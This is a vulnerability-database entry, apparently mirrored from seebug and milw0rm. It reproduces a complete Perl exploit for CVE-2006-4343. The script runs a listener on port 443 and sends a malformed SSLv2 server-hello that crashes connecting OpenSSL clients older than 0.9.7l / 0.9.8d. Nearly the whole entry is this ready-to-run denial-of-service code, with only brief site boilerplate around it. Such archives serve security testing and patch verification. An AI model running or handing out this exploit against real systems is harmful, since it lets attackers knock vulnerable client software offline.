Lucene search
K

OpenSSL < 0.9.7l / 0.9.8d - SSLv2 Client Crash Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 71 Views

OpenSSL SSLv2 Client Crash Exploi

Related
Code

                                                #!/usr/bin/perl
# Copyright(c) Beyond Security
# Written by Noam Rathaus - based on beSTORM&#39;s SSL Server module
# Exploits vulnerability CVE-2006-4343 - where the SSL client can be crashed by special SSL serverhello response

use strict;
use IO::Socket;
my $sock = new IO::Socket::INET ( LocalPort =&#62; &#39;443&#39;, Proto =&#62; &#39;tcp&#39;, Listen =&#62; 1, Reuse =&#62; 1, );
die &#34;Could not create socket: $!\n&#34; unless $sock;
 
my $TIMEOUT = 0.5;
my $line;
my $new_sock;
srand(time());

while ( $new_sock = $sock-&#62;accept() )
{
 printf (&#34;new connection\n&#34;);
 my $rin;
 my $line;
 my ($nfound, $timeleft) = select($rin, undef, undef, $TIMEOUT) && recv($new_sock, $line, 1024, undef);

 my $ciphers = &#34;&#34;;
 my $ciphers_length = pack(&#39;n&#39;, length($ciphers));

 my $certificate = &#34;&#34;;
 my $certificate_length = pack(&#39;n&#39;, length($certificate));

 my $packet_sslv2 =
&#34;\x04&#34;.
&#34;\x01&#34;. # Hit (default 0x01)

&#34;\x00&#34;. # No certificate

&#34;\x00\x02&#34;.
$certificate_length.
$ciphers_length.
&#34;\x00\x10&#34;.
# Certificate
$certificate.
# Done
# Ciphers
$ciphers.
# Done
&#34;\xf5\x61\x1b\xc4\x0b\x34\x1b\x11\x3c\x52\xe9\x93\xd1\xfa\x29\xe9&#34;;

 my $ssl_length = pack(&#39;n&#39;, length($packet_sslv2) + 0x8000);
 $packet_sslv2 = $ssl_length . $packet_sslv2;

 print $new_sock $packet_sslv2;

 close($new_sock);
}

# milw0rm.com [2007-12-23]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
EPSS0.16994
71